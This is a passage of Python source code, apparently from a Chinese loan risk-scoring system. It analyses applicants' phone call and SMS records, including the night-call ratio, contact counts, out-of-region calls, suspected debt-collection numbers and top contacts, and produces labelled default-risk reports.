{\n \"name\": \"夜间通话占比\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n night_count, sum_ = 0, 0\n for ele in data:\n sum_ += int(ele.get('connTimes', 0))\n if judge_night(ele) is True:\n night_count += int(ele.get('connTimes', 0))\n\n def out_put(night, sum_):\n template1 = '近6个月夜间通话占比≦10%,违约风险低'\n template2 = '近6个月夜间通话占比10%~30%,有违约风险'\n template3 = '近6个月夜间通话占比>30%,违约风险较高'\n\n r = two_num(night_count * 100 / sum_ if sum_ else 0)\n level = None\n if r <= 10:\n ret_ = template1\n level = 1\n elif r < 30:\n ret_ = template2\n level = 2\n else:\n ret_ = template3\n level = 4\n\n return {\n \"name\": \"夜间通话占比\",\n \"result\": ('%.2f' % r if r else '0.0') + '%',\n \"accord\": ret_,\n \"assess\":level\n }\n\n return out_put(night_count, sum_)\n except:\n return {\n \"name\": \"夜间通话占比\",\n \"result\": 0,\n \"accord\": '近6个月夜间通话占比≦10%,违约风险低',\n \"assess\": 1,\n }\n\n def contract_num(self, data_r, flag):\n \"\"\" 联系人数量 (6个月)\"\"\"\n # data = self.data.get(\"monthCallInfo\").copy()\n if data_r is None:\n data_r = {}\n\n data = data_r.copy()\n data = data.get('sixMonth', {})\n if not data and flag is False:\n\n return {\n \"name\": \"联系人数量\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n template = {\n 0: '近6个月联系人数量大于10人时,失联风险低',\n 1: '近6个月联系人数量低于10人时,有失联风险' }\n\n num = int(data.get(\"contactsNum\", 0))\n level = 0\n if num < 10:\n level = 1\n return {\n 'name': '联系人数量',\n 'result': num,\n \"accord\": template[level],\n 'assess': level + 1}\n except:\n return {\n 'name': '联系人数量',\n 'result': 0,\n \"accord\": \"近6个月联系人数量低于10人时,有失联风险\",\n 'assess': 1}\n\n def contact_phone_num(self, data_r, flag):\n \"\"\" 互通电话数量 \"\"\"\n # data = self.data.get(\"monthCallInfo\").copy()\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get('sixMonth', {})\n if not data and flag is False:\n\n return {\n \"name\": \"互通电话数量\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n template = {\n 1: '近6个月互通电话数小于5人时,有失联风险',\n 0: '近6个月互通电话数大于5人时,失联风险低'}\n\n num = int(data.get(\"mutualNum\", 0))\n level = 0\n if num < 5:\n level = 1\n return {\n 'name': '互通电话数量',\n 'result': num,\n \"accord\": template[level],\n 'assess': level + 1}\n except:\n return {\n \"name\": \"互通电话数量\",\n \"result\": 0,\n \"accord\": '近6个月互通电话数小于5人时,有失联风险',\n \"assess\": 1,\n }\n\n def remote_phone_rate(self, data_r, flag):\n \"\"\" 异地通话占比 \"\"\"\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get('deceitRisk', {}).get(\"monthCallInfo\", {}).get(\"oneMonth\", {})\n # 进入到这个函数说明已经查询良,但是没有查询到数据而已\n if not data:\n return {\n \"name\": \"异地通话记录\",\n \"result\": 0,\n \"accord\": '近1个月异地通话时间占比小于30%时,违约风险低',\n \"assess\": 1,\n }\n all_num = data.get('allNum', 1)\n template = {\n 0: '近1个月异地通话时间占比小于30%时,违约风险低',\n 1: '近1个月异地通话时间占比小于50%时,有违约风险',\n 2: '近1个月异地通话时间占比大于50%时,违约风险高'\n }\n template_li = '{0}通话{1}次,通话时间{2}分钟,主叫{3}次、被叫{4}次,最近通话时间{5} '\n self_phone_area = data_r.get(\"baseInfo\", {}).get(\"phoneBelongArea\", \"\")\n city = data_r.get(\"baseInfo\", {}).get(\"city\", \"\")\n province = data_r.get(\"baseInfo\", {}).get(\"province\", \"\")\n self_phone_type = data_r.get(\"phoneInfo\", {}).get(\"operator\", \"\")\n\n def num_(d):\n try:\n return int(d)\n except:\n return 0\n\n def init_dict(d, key):\n if key in d:\n return\n d[key] = {\n 'times': 0,\n \"duration\": 0, # 通话时间\n \"callTimes\": 0,\n \"calledTimes\": 0,\n \"lastTime\": datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n }\n\n def cus_time_handle(d):\n try:\n return datetime.datetime.strptime(d, 
\"%Y-%m-%d %H:%M:%S\")\n except:\n return datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n\n def cus_time_str(d):\n try:\n if d == datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\"):\n return '--'\n return d.strftime(\"%Y-%m-%d %H:%M:%S\")\n except:\n return '--'\n\n def ratio_han(a, b):\n try:\n return float('%.2f' % (a*100/b))\n except:\n return 0\n\n def dict_num_handle(src, dest):\n area = src.get(\"location\", \"\") or \"\"\n init_dict(dest, area)\n dest[area]['duration'] = num_(dest[area].get(\"duration\", \"\")) + num_(src.get(\"duration\", 0))\n dest[area]['callTimes'] = num_(dest[area].get(\"callTimes\", \"\")) + (1 if src.get(\"dial_type\", '') == 'DIAL' else 0)\n dest[area]['calledTimes'] = num_(dest[area].get(\"calledTimes\", \"\")) + (0 if src.get(\"dial_type\", '') == 'DIAL' else 1)\n dest[area]['lastTime'] = dest[area]['lastTime'] if dest[area]['lastTime'] < cus_time_handle(src.get(\"time\")) else cus_time_handle(src.get(\"time\"))\n dest[area]['times'] += 1\n\n remote_result = {}\n remote_count = 0\n\n def remote(city, province, location, location_type):\n mobileCity = city # 帐号归属城市\n mobileProvince = province # 帐号归属省份\n ROAM_1 = u\"漫游\"\n ROAM_2 = u\"非\"\n ROAM_3 = u\"异地\"\n ROAM_4 = u\"边漫\"\n # 判定为非异地通话\n if mobileCity and mobileProvince and location:\n if mobileProvince == location or mobileProvince + u\"省\" == location:\n return False\n # 判定为异地通话\n if location not in mobileCity and mobileCity not in location:\n return True\n else:\n\n # 通话地类型是漫游的判定为漫游\n if not location_type:\n return False\n # 通话地类型是漫游的判定为漫游\n if (ROAM_1 in location_type and ROAM_2 in location_type) or ROAM_3 in location_type or ROAM_4 in location_type:\n # 判定为异地通话\n return True\n # 判定为非异地通话\n return False\n\n def map_f(ele, sum_d):\n nonlocal city, province, self_phone_area, remote_count\n\n # if self_phone_type is True and (ele.get(\"location\", \"\") != self_phone_area): # 联通\n # return\n # if self_phone_type is False and ('本地' not in ele.get(\"location_type\", '')):\n # return\n# location = ele.get(\"location\", \"\")\n# if not location:\n# location = \"\"\n# if not isinstance(self_phone_area, str) and len(self_phone_area) <= 2:\n# return\n# if self_phone_area[2:] in location:\n# return\n if not remote(city, province, ele.get(\"location\", \"\"), ele.get(\"location_type\", \"\")):\n return\n remote_count += 1\n # 数据计算\n dict_num_handle(ele, sum_d)\n\n def result_handle(key, value):\n \"\"\" \"\"\"\n return template_li.format(key, value['times'], '%.2f' % float(two_num(value['duration'] / 60)), value['callTimes'],\n value['calledTimes'], cus_time_str(value.get('lastTime', '')))\n\n map_f_par = partial(map_f, sum_d=remote_result)\n import json\n list(map(map_f_par, data.get(\"callList\", [])))\n\n # d = list(map(result_handle, remote_result))\n html_lis = ''.join([result_handle(key, value) for key, value in remote_result.items()])\n ratio = ratio_han(remote_count, all_num)\n\n url = \"\"\n result = 0\n if ratio < 30:\n url += template[0]\n result = 1\n elif ratio <= 50:\n url += template[1]\n result = 2\n else:\n url += template[2]\n result = 4\n\n url += ' '\n url += html_lis\n return {\n \"name\": \"异地通话记录\",\n \"result\": (('%.2f' % ratio) if ratio else ('%.1f' % ratio)) + \"%\",\n \"accord\": url,\n \"assess\": result\n }\n\n def collection_list(self, data_r, flag):\n \"\"\" 疑似催收 \"\"\"\n data = data_r.copy()\n if not data and flag is False:\n\n return {\n \"name\": \"疑似催收号码\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n cuishou_list = data\n sum_ = 
len(cuishou_list)\n if sum_:\n ll = \"\" + \" \".join(cuishou_list) + \" \"\n else:\n ll = \"\"\n level = 1\n if 3 <= sum_ <= 5:\n level = 2\n elif sum_ > 5:\n level = 4\n temp = {\n 1: \"近3个月未发现连续号段疑似催收号码{0}\",\n 2: \"近3个月与3~5个连续号段号码有联系,风险等级关注{0}\",\n 4: \"近3个月与5个以上连续号段号码有联系,风险等级高{0}\"\n }\n return {\n \"name\": \"疑似催收号码\",\n \"accord\": temp[level].format(ll),\n \"assess\": level,\n \"result\": 0 if sum_ < 3 else sum_\n }\n except:\n return {\n \"name\": \"疑似催收号码\",\n \"accord\": \"近3个月未发现连续号段疑似催收号码\",\n \"assess\": 1,\n \"result\": 0\n }\n\n def contact_tel_risk(self, data_r, flag):\n \"\"\" 联系人电商平台高危客户 \"\"\"\n template0 = '检测到电商平台高危客户:'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到电商平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n tel_risk_list = deceit_risk.get('telRiskList', []) or []\n tel_risk = len(tel_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n if not tel_risk_list and flag is False:\n return {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n elif not tel_risk_list:\n return {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in tel_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人电商平台高危客户\",\n 'result': tel_risk,\n 'accord': accord,\n 'assess': level_handle(tel_risk)\n }\n\n def contact_xinfo_risk(self, data_r, flag):\n \"\"\" 联系人信息台高危客户 \"\"\"\n template0 = '检测到信息平台高危客户:'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到信息平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n info_risk_list = deceit_risk.get('infoRiskList', []) or []\n info_risk = len(info_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n if not info_risk_list and flag is False:\n\n return {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n\n elif not info_risk_list:\n return {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in info_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人信息平台高危客户\",\n 'result': info_risk,\n 'accord': accord,\n 'assess': level_handle(info_risk)\n }\n\n def contact_social_risk(self, data_r, flag):\n \"\"\" 联系人社交平台高危客户 \"\"\"\n template0 = '检测到社交平台高危客户'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到社交平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n social_risk_list = deceit_risk.get('socialRiskList', []) or []\n 
social_risk = len(social_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n\n if not social_risk_list and flag is False:\n\n return {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n\n elif not social_risk_list:\n return {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in social_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人社交平台高危客户\",\n 'result': social_risk,\n 'accord': accord,\n 'assess': level_handle(social_risk)\n }\n\n def risk_phone_analyze(self, data_r, flag):\n \"\"\" 风险号码标识记录分析 \"\"\"\n risk_nums = ('贷款中介', '信用卡', '律师电话', '法院电话', '110电话', '澳门电话')\n data = self.data.get(\"callRecordsInfo\", []).copy()\n # flag = True\n # if not data:\n # flag = False\n\n ret = [0] * len(risk_nums)\n for i in range(len(ret)):\n ret[i] = {\n 'callTimes': 0 if flag is True else '',\n 'calledTimes': 0 if flag is True else '',\n \"connCallTime\": 0 if flag is True else '',\n \"connCalledTimes\": 0 if flag is True else '',\n \"connTimes\": 0 if flag is True else '',\n 'lastCallTime': 0 if flag is True else '',\n \"phoneSum\": 0 if flag is True else '',\n 'tag': risk_nums[i] if i != 1 else \"信用卡中心\",\n }\n if flag is False:\n for i in range(len(ret)):\n ret[i]['lastCallTime'] = ''\n return ret\n\n for ele in data:\n remark = ele.get('remark', '')\n # 没有标记的直接跳过\n if (not remark) or (remark not in risk_nums):\n continue\n\n sb_index = risk_nums.index(remark)\n\n # ret[sb_index] = {\n # 'callTimes': ret[remark].get('callTimes', 0),\n # 'calledTimes': 0,\n # \"connCallTime\": 0,\n # \"connCalledTimes\": 0,\n # \"connTimes\": 0,\n # 'lastCallTime': 0,\n # \"phoneSum\": 0\n # }\n\n ret[sb_index]['callTimes'] += int(ele.get('callTimes', 0))\n ret[sb_index]['calledTimes'] += int(ele.get('calledTimes', 0))\n ret[sb_index]['connCallTime'] += int(ele.get('connCallTime', 0))\n ret[sb_index]['connCalledTimes'] += int(ele.get('connCalledTimes', 0))\n ret[sb_index]['connTimes'] += int(ele.get('connTimes', 0))\n if ele.get('lastCallTime') > int(ret[sb_index]['lastCallTime']):\n ret[sb_index]['lastCallTime'] = int(ele.get('lastCallTime'))\n ret[sb_index]['phoneSum'] += 1\n\n result = []\n\n for ele in ret:\n result.append({\n \"callTimes\": ele.get(\"connTimes\", 0), # 通话次数\n \"calledMinute\": second_to_minute(int(ele.get(\"connCalledTime\", 0))), # 被叫时间\n \"calledTimes\": ele.get(\"calledTimes\", 0), # 被叫次数\n \"callingMinute\": second_to_minute(int(ele.get(\"connCallTime\", 0))), # 主叫���间\n \"callingTimes\": ele.get(\"callTimes\"), # 主叫次数\n \"lastConnTime\": cao_time_time_to_str(int(ele.get(\"lastCallTime\", 0))),\n \"tag\": ele.get(\"tag\", ''),\n \"telNum\": ele.get(\"phoneSum\", 0), # 号码数量\n })\n\n return result\n\n def important_conn_analysis(self, data_r, relation=None, work=None, school=None, flag=True):\n \"\"\" 重要联系人分析 \"\"\"\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get(\"callRecordsInfo\", []).copy()\n\n def 
get_relation_phone(ph, d):\n            if d is None:\n                return False\n            if ph == d['phone']:\n                return True\n            return False\n\n        def num_handle(d):\n            try:\n                return int(d)\n            except Exception:\n                return 0\n\n        def add_ele(list_, v2):\n            phone_n = v2.get(\"phoneNo\", '')\n            flag = False\n            indexs = []\n            # if several contacts share the same number, the later one wins\n            if get_relation_phone(phone_n, relation):\n                indexs.append(0)\n                flag = True\n            if get_relation_phone(phone_n, work):\n                indexs.append(1)\n                flag = True\n            if get_relation_phone(phone_n, school):\n                indexs.append(2)\n                flag = True\n\n            if flag is True:\n                for index in indexs:\n                    v1 = list_[index]\n                    count = num_handle(v2.get('callTimes')) + num_handle(v2.get(\"calledTimes\"))\n                    v1[\"callTimes\"] = count\n                    v1[\"ratio\"] = \"\"\n                    v1[\"address\"] = v2.get(\"belongArea\", \"\")\n                    v1[\"callingTimes\"] = v2.get(\"callTimes\", 0)\n                    v1[\"calledTimes\"] = v2.get(\"calledTimes\", 0)\n                    v1[\"coverageCallMinute\"] = '%.2f' % float(two_num(second_to_minute(num_handle(v2.get(\"connCallTime\", 0)) + num_handle(v2.get(\"connCalledTime\", 0))) / count)) if count else '0.00'\n\n        def my_list(iter_l):\n            l = []\n            tmp_d = {\n                \"type\": \"\",\n                \"relation\": '',\n                \"name\": '',\n                \"telphone\": '',\n                \"callTimes\": 0,\n                # \"ratio\": \"\",\n                \"address\": '',\n                \"callingTimes\": 0,\n                \"calledTimes\": 0,\n                \"coverageCallMinute\": '0.00'\n            }\n\n            def map_f(key):\n                nonlocal tmp_d\n                d = tmp_d.copy()\n                if key is None:\n                    return d\n                d.update({\n                    \"type\": key['type'],\n                    'relation': key['relation'],\n                    'name': key['name'],\n                    'telphone': key['phone']\n                })\n                return d\n            l = list(map(map_f, iter_l))\n            return l\n\n        sum_ = 0\n\n        def map_func(old, ele):\n            # nonlocal sum_, r, w, s\n\n            sum_, tuple_import = old[0], old[1]\n\n            sum_ += num_handle(ele.get(\"connTimes\"))\n            # if relation.get(\"\")\n            # if get_relation_phone(phone_n, relation) or get_relation_phone(phone_n, work) or \\\n            #         get_relation_phone(phone_n, school):\n            #     for index, _ in enumerate(tuple_import):\n            add_ele(tuple_import, ele)\n            return sum_, tuple_import\n\n        init_param = my_list([relation, work, school])\n        from functools import reduce\n        sum_, ret = list(reduce(map_func, data, (0, init_param)))\n\n        for i in range(len(ret)):\n            x = ret[i]\n            ret[i]['ratio'] = '%.2f' % two_num(num_handle(x.get('callTimes', 0))*100 / sum_) if sum_ != 0 else 0\n        ret = list(filter(lambda x: x['telphone'], ret))\n        return ret\n\n    def important_conn_chart(self, data, rel, work, school):\n        \"\"\" Key-contact monthly call-trend analysis \"\"\"\n        d = (rel, work, school)\n        today_ = data.get(\"baseInfo\", {}).get(\"reportTime\", \"\")\n        try:\n            today_ = datetime.datetime.strptime(today_, '%Y-%m-%d %H:%M:%S')\n        except Exception:\n            today_ = datetime.datetime.now()\n\n        ret, today = [], today_\n        six_month = {}\n        data = data.get(\"deceitRisk\", {}).get(\"monthCallInfo\", {}).get(\"sixMonth\", {}).get(\"callList\", [])\n\n        def time_handle(current_day, index):\n            nonlocal six_month\n\n            six_month[current_day.strftime('%Y%m')] = 0\n            if index >= 6:\n                return\n            last_month = datetime.timedelta(days=current_day.day) # step back past the 1st into the previous month\n            a = current_day - last_month\n            time_handle(a, index + 1)\n\n        time_handle(today, 1)\n        # time_keys = .keys()\n        relation = (six_month.copy(), six_month.copy(), six_month.copy())\n\n        def map_f(ele):\n            nonlocal ret, six_month, d, data\n            if ele is None:\n                return\n            index = d.index(ele)\n            for record in data:\n                # debug: compare record.get(\"peer_number\") with ele.get(\"phone\")\n                if record.get(\"peer_number\", '') == ele.get(\"phone\"):\n                    month = record.get('month', '')\n                    if month in relation[index]:\n                        relation[index][month] += 1\n\n        list(map(map_f, d))\n\n        def map_ret(ele):\n            nonlocal 
d, relation, ret\n            if ele is None:\n                return\n            index = d.index(ele)\n            d2 = [{\"callTimes\": value, 'time': datetime.datetime.strptime(key, '%Y%m')\n                   } for key, value in relation[index].items()]\n            d2 = sorted(d2, key=lambda x: x['time'])\n            ret.append({\n                \"name\": ele.get(\"type\", ''),\n                \"value\": d2\n            })\n        list(map(map_ret, d))\n        return ret\n\n    def connection_top_analyze(self, data_r, top_n=5):\n        \"\"\" Top-N contact analysis \"\"\"\n        data = data_r.copy()\n        data = data.get(\"callRecordsInfo\", {}).copy()\n        # sort by connected calls, descending\n        data = sorted(data, key=lambda x: int(x.get('connTimes', 0)), reverse=True)\n        ret, sum_ = [], 0\n\n        for i in range(len(data)):\n            sum_ += int(data[i].get(\"connTimes\"))\n            if i >= top_n:\n                continue\n\n            ret.append({\n                \"address\": data[i].get(\"belongArea\", ''),\n                \"callTimes\": int(data[i].get(\"connTimes\", 0)),\n                \"calledTimes\": data[i].get(\"calledTimes\", 0),\n                \"callingTimes\": data[i].get(\"callTimes\", 0),\n                'tag': data[i].get('remark', ''),\n                \"coverageCallTime\": two_num((second_to_minute(int(data[i].get(\"connCallTime\", 0)) + int(data[i].get(\"connCalledTime\", 0)))) / int(data[i].get(\"connTimes\", 0))),\n                \"ratio\": \"\",\n                \"label\": data[i].get(\"label\", \"--\"),\n                \"telphone\": data[i].get(\"phoneNo\", '')\n            })\n        for i in range(top_n):\n            if i >= len(data):\n                break\n            if sum_ != 0:\n                ret[i]['ratio'] = '%.2f' % two_num(int(ret[i]['callTimes'])*100 / sum_)\n            else:\n                ret[i]['ratio'] = 0\n\n        return ret\n\n    def phone_region_top5(self, data_r, top_n=5):\n        \"\"\" Top-5 analysis of the subscriber's own call locations \"\"\"\n        data = data_r.get('callPlaceInfo', {}).copy()\n        data = sorted(data, key=lambda x: int(x['dayStop']), reverse=True)\n        ret, sum_ = [], 0\n\n        def time_str_handler(d):\n            if isinstance(d, str) and d[0:4] == '1970':\n                return ''\n\n            # if isinstance(d, str) and len(d) == 8:\n            #     return d[0:4] + '-' +d[4:6] + '-' + d[6:]\n            return cao_time_time_to_str(d)\n            # return d\n\n        for index in range(top_n):\n            if index >= len(data):\n                break\n            ele = data[index]\n            sum_ += ele.get('connTimes', 0)\n            if index > top_n:\n                continue\n\n            ret.append({\n                \"address\": ele.get(\"commType\", ''),\n                \"callTimes\": ele.get(\"connTimes\", ''),\n                'days': ele.get(\"dayStop\", ''),\n                \"firstTime\": time_str_handler( int(ele.get(\"firstCallTime\", 0)) ) or '',\n                \"lastTime\": time_str_handler( int(ele.get(\"lastCallTime\", 0)) ) or '',\n                \"ratio\": ''\n            })\n        for i in range(top_n):\n            if i >= len(data):\n                break\n            if sum_ != 0:\n                ret[i]['ratio'] = '%.2f' % two_num(int(ret[i]['callTimes'])*100 / sum_)\n            else:\n                ret[i]['ratio'] = 0\n\n        return ret\n\n    def contract_area(self, data_r, top_n=5):\n        \"\"\" Top-5 contact-region analysis \"\"\"\n        if data_r is None:\n            data_r = {}\n        data = data_r.get('contactsPlaceInfo', {}).copy()\n        data = sorted(data, key=lambda x: int(x.get(\"phoneNum\", 0)), reverse=True)\n        ret, sum_ = [], 0\n\n        for index in range(top_n):\n            if index >= len(data):\n                break\n            ele = data[index]\n            sum_ += int(ele.get('phoneNum', 0))\n            if index > top_n:\n                continue\n\n            ret.append({\n                \"address\": ele.get(\"commPlac\", ''),\n                \"calledSecond\": '%.2f' % second_to_minute(int(ele.get(\"calledTime\", 0))),\n                \"calledTimes\": ele.get(\"calledTimes\", 0),\n                \"callingSecond\": '%.2f' % second_to_minute(int(ele.get(\"callTime\", 0))),\n                \"callingTimes\": ele.get(\"callTimes\", 0),\n                \"ratio\": '',\n                \"telNum\": ele.get(\"phoneNum\")\n            })\n        for i in range(top_n):\n            if i >= len(data):\n                break\n            ret[i]['ratio'] = '%.2f' % two_num(int(ret[i]['telNum'])*100 / sum_ if sum_ != 0 else 0)\n        return ret\n\n    def conversation_slot(self, data_r):\n        \"\"\" Call time-of-day distribution \"\"\"\n        data = 
data_r.get(\"callDuration\", {}).copy()\n data = sorted(data, key=lambda x: int(x.get(\"startTime\", 0)))\n\n def encode_(d):\n d = int(d)\n if 530 <= d <900:\n return 0\n elif 900 <= d < 1130:\n return 1\n elif 1130 <= d < 1330:\n return 2\n elif 1330 <= d < 1730:\n return 3\n elif 1730 <= d < 2330:\n return 4\n elif 130 <= d < 530:\n return 6\n else:\n return 5\n d = {\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 0,\n 4: 0,\n 5: 0,\n 6: 0}\n duation = ['05:30-09:00', '09:00-11:30', '11:30-13:30', '13:30-17:30', '17:30-23:30', '23:30-01:30', '01:30-05:30']\n ret, sum_ = [], 0\n\n def map_f(x):\n nonlocal sum_\n n = encode_(x['connTime'])\n d[n] += int(x['connTimes'])\n sum_ += int(x['connTimes'])\n\n list(map(map_f, data))\n\n for i in range(7):\n ele = {\n 'ratio': '%.2f' % two_num(d[i] * 100 / sum_ if sum_ != 0 else 0),\n 'contactTimes': d[i],\n 'time': duation[i]\n }\n ret.append(ele)\n return ret\n\n def average_consume(self, data):\n \"\"\" 计算每个月平均消费 \"\"\"\n if not isinstance(data, list):\n return ''\n sum_, count = 0, 0\n\n def money_unit_trans(d, rate=1, type_=0):\n try:\n ret = float(d) / rate\n if type_ != 0:\n ret = float('%.2f' % ret)\n return ret\n except:\n return 0\n\n for i in data:\n count += 1\n sum_ += money_unit_trans(i.get(\"billFee\", 0))\n\n if count == 0:\n return ''\n\n sum_ = sum_ / count\n sum_ = money_unit_trans(sum_, type_=1)\n sum_ = two_num(sum_/100)\n return sum_\n\n # 用户异常行为分析\n def user_exception_handler(self, data_r, flag, token=None, now=None):\n data = data_r.copy()\n if not data:\n if token:\n word = '查询中'\n else:\n word = '未查询'\n ret = [\n {\n \"name\": \"手机长时间静默情况\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"夜间通话占比\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人数量\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"互通电话数量\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"异地通话记录\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"疑似催收号码\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n }\n\n ]\n return ret\n\n ret = []\n ret.append(self.long_time_slicense(data.get('deceitRisk', {}).get(\"silenceInfo\", []), flag, now))\n ret.append(self.contract_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.contact_phone_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.night_phone(data.get('deceitRisk', {}).get('callDuration', []), flag))\n # ret.append(self.remote_phone_rate(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.remote_phone_rate(data, flag))\n ret.append(\n self.collection_list(data.get(\"deceitRisk\", {}).get(\"monthCallInfo\", {}\n ).get(\"threeMonth\", {}).get(\"collectionList\", []), flag))\n # ret.append(self.contact_tel_risk( data, flag))\n # ret.append(self.contact_xinfo_risk(data, flag))\n # ret.append(self.contact_social_risk(data, flag))\n return ret\n\n @classmethod\n def contract_record(cls, data_r, s_type, page, count, apply_number=None):\n \"\"\" 通话记录分析 \"\"\"\n if data_r is None:\n data_r = []\n data = data_r.copy()\n def key_f(d):\n nonlocal s_type\n if s_type == 1 and (not (d['remark'] or d.get('label'))):\n 
return False\n            return True\n        total_remark = None\n        if s_type == 0:\n            total_remark = 0\n            for i in data:\n                if i['remark'] or i.get('label'):\n                    total_remark += 1\n\n        data = sorted(filter(key_f, data), key=lambda x: int(x.get(\"connTimes\", 0)), reverse=True)\n\n        total, ret = len(data), []\n        if total_remark is None:\n            total_remark = total\n\n        if count == -1:\n            start, end = 0, total\n        else:\n            start, end = (page - 1) * count, page * count\n\n        def _ret(i):\n\n            return {\n                \"belongArea\": i.get('belongArea', ''),\n                \"callTimes\": i.get('callTimes', ''),\n                \"calledTimes\": i.get(\"calledTimes\", ''),\n                \"connTime\": two_num(second_to_minute(int(i.get('connCallTime', 0))) + second_to_minute(int(i.get('connCalledTime', 0)))),\n                \"connTimes\": i.get(\"connTimes\", ''),\n                \"identifyInfo\": i.get(\"remark\", ''),\n                \"label\": i.get(\"label\", \"--\"),\n                \"phoneNo\": i.get(\"phoneNo\")\n            }\n\n        ret = [_ret(i) for i in data]\n        res = {\n            'total': total,\n            'callDetail': ret,\n            'totalRemark': total_remark\n        }\n        if apply_number:\n            save_to_cache(apply_number, res, 'call_record_view')\n\n        res['callDetail'] = res['callDetail'][start: end]\n\n        return res\n\n    @classmethod\n    def sms_record_analyze(cls, data_r, s_type, page, count, apply_number=None):\n        \"\"\" SMS-record analysis \"\"\"\n        data = data_r.copy()\n\n        def key_f(d):\n            nonlocal s_type\n            # if s_type == 1 and not d['remark']:\n            if s_type == 1 and (not (d['remark'] or d.get('label'))):\n                return False\n            return True\n\n        total_remark = None\n        if s_type == 0:\n            total_remark = 0\n            for i in data:\n                if i['remark'] or i.get('label'):\n                    total_remark += 1\n\n        data = sorted(filter(key_f, data), key=lambda x: int(x.get(\"totalSmsNumber\", 0)), reverse=True)\n        total, ret = len(data), []\n\n        if total_remark is None:\n            total_remark = total\n        if count == -1:\n            start, end = 0, total\n        else:\n            start, end = (page - 1) * count, page * count\n\n        def _detail(i):\n\n            return {\n                \"belongArea\": i.get('belongArea', ''),\n                \"identifyInfo\": i.get(\"remark\", ''),\n                \"phoneNo\": i.get(\"phoneNo\"),\n                \"label\": i.get(\"label\", '--'),\n                \"totalSmsNumber\": i.get(\"totalSmsNumber\", '')\n            }\n\n        ret = [_detail(i) for i in data]\n\n        res = {\n            'total': total,\n            'msgDetail': ret,\n            \"totalRemark\": total_remark\n        }\n\n        if apply_number:\n            save_to_cache(apply_number, res, 